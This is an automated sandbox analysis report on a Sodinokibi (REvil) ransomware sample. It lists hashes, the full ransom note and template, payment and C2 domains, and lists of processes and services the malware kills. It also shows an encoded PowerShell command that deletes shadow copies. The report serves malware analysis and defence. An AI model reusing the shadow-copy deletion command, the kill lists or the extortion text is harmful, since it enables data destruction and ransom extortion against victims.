Analysis

  • max time kernel
    131s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:08

General

  • Target

    c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe

  • Size

    391KB

  • MD5

    3e90448b831a31a59f12426668824b63

  • SHA1

    5ef4d8f05886bc4e5d4f609bcb0d31f8fc620084

  • SHA256

    c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd

  • SHA512

    bd286065f98d6624597ed8c25bdc487acf72fd742a29dcc6e176cd0dd783ea2f0d378ffcc435cf655f10c75232af66bb95d1d3fe8e8452058965ecbc429ee495

Malware Config

Extracted

Path

C:\5z3k8w-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5z3k8w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0ED9DD8958A65B5F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0ED9DD8958A65B5F Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9rmUeQKXedqeTLymrGHEV6fK1pk4RDL1kcVwTTLHQCGT5GvBKwntH/+bF74zzM5e fvDRbetGfTi1jWdt8HW0BWOqI0XUNCeaXrCpSEgr3WS0xFOJsE4B29iYW+UUmikc B3D16mMtLpJ+uN7PLnrvHamffXUXILq3mtfRVcT3KJ35km8EPc6Y7v6/OsMWQ4MN cqb0SX8HfgOc0w24McMpEtuovVj0TX1KjidKpfpKQHb99C8I/6tWgTDZxgj34AzO ZnnxOo0KHxFZ8RInTtagSN1GolIviuKcGSOvtvU9gpfVjk5YzetkhQNwAi6wdMFX l5b+H8fjkXfjrZmvpCtcqGRGb36hjuzz2ZZMxDZW+xA9gILQrfR6ZpJhltuAF49/ sOtpToyQ+cn6uZXx9zRSz0deMlYDBvelElGjMH+CHk7UUzz4KNN0Dx3KDCIucG57 pYSRlQzbRt8/xjFxHoyfojfWdxkyfVniq3TyCFE+kndm8PuXwOYa+8D+p1ZkLjQz SdDue9X4FZwKk4BKzHwhXuo13czMJ92Wy6TZqqIA7y8pbqplNOtY44tTQYq4Ex7C 1UUi+bZXK3juQqp/PYHaDYs6vQk1O6qaVDvYVElp/U0rj6ckjX1fvxvJWXu3HAN4 o7GBOv66RZLu0NnKMRzh9LB4FjW+1lHMdIQ0fPmcm/CalddasdwUP4Rz6hhZF3Yl PGbF8bnBQBdvm49QN73pwHEZj5SAQMfd4oA6b1qDItwV4AJz7disOw1awP1+2GUk cBQagG1Rdw7EkfNnQGjZEBCoOd1hqSUAERtsSCeZmxQ6Fus3ZYFGmoacXxXdjvwG taKKeDu0GK8ifbObvV8T/OuvS7dYOLNFoiD0UgPhHWDXVPx/b6NkWm6ephF0pKsB XUrRDsITyiKN6ZGx0TyQnthg3QjEqzpbXHQH2Ldht2jMG7kAEQ3Sz9RMtojSsIjt FbxWOctbbwlFUuXHUxXoqFuhdph2EaZyOShi8APFh+sO8dW8fT4yoTWZhY5n9Whg MImr2vyi+rnRDQ7Xqt33uFqzFQNmYGKu1CrWV6Fq0T6qsjpSzFZU7ehpEfKAR/bb j3hFkljLbzn07NBXC5CEOVDnvEoqijyny6MvN3oBr5L6thgnvmL6R3i6zxEYKSyT Qp58y74Vf4kNGHl31v2qArx8keQT7KfOtu+oABX9iM3dt6JM/5Twa2YDqN6GqZO2 jmlRdzLrz//4Ktv27CNpiKFtHP4+MNFt7/cW4C02k26mWQkkhbREKdRCQQ0sPJ46 XuQFcVgUetzclEKOQZxxpG3rAWh3HAbM Extension name: 5z3k8w ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0ED9DD8958A65B5F

http://decryptor.cc/0ED9DD8958A65B5F

Extracted

Family

sodinokibi

Botnet

$2a$10$R6jfdY.02Ns/TL60z.A74O5Dw8.5EqXA63YzUP5X2NSO0l.4y0Gfa

Campaign

1428

C2

firstpaymentservices.com

krcove-zily.eu

softsproductkey.com

naturavetal.hr

corelifenutrition.com

leda-ukraine.com.ua

beaconhealthsystem.org

acomprarseguidores.com

extraordinaryoutdoors.com

mardenherefordshire-pc.gov.uk

stopilhan.com

triggi.de

anteniti.com

aunexis.ch

boosthybrid.com.au

bee4win.com

gadgetedges.com

tandartspraktijkheesch.nl

8449nohate.org

simoneblum.de

Attributes
  • net

    true

  • pid

    $2a$10$R6jfdY.02Ns/TL60z.A74O5Dw8.5EqXA63YzUP5X2NSO0l.4y0Gfa

  • prc

    excel

    mydesktopservice

    sqlwriter

    ocomm

    powerpnt

    oracle

    mydesktopqos

    ocautoupds

    ocssd

    encsvc

    mysqld_opt

    msaccess

    visio

    agntsvc

    winword

    sqlservr

    tbirdconfig

    wordpad

    xfssvccon

    msftesql

    firefoxconfig

    dbsnmp

    onenote

    thunderbird

    outlook

    isqlplussvc

    dbeng50

    mspub

    thebat64

    sqbcoreservice

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1428

  • svc

    vss

    mepocs

    veeam

    svc$

    backup

    sophos

    memtas

    sql

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe
    "C:\Users\Admin\AppData\Local\Temp\c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:544
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1244
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1496

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-54-0x00000000751B1000-0x00000000751B3000-memory.dmp

      Filesize

      8KB

    • memory/524-61-0x0000000000E60000-0x0000000000E85000-memory.dmp

      Filesize

      148KB

    • memory/544-55-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

      Filesize

      8KB

    • memory/544-56-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp

      Filesize

      11.4MB

    • memory/544-57-0x000000001B7E0000-0x000000001BADF000-memory.dmp

      Filesize

      3.0MB

    • memory/544-58-0x00000000029A4000-0x00000000029A7000-memory.dmp

      Filesize

      12KB

    • memory/544-59-0x00000000029AB000-0x00000000029CA000-memory.dmp

      Filesize

      124KB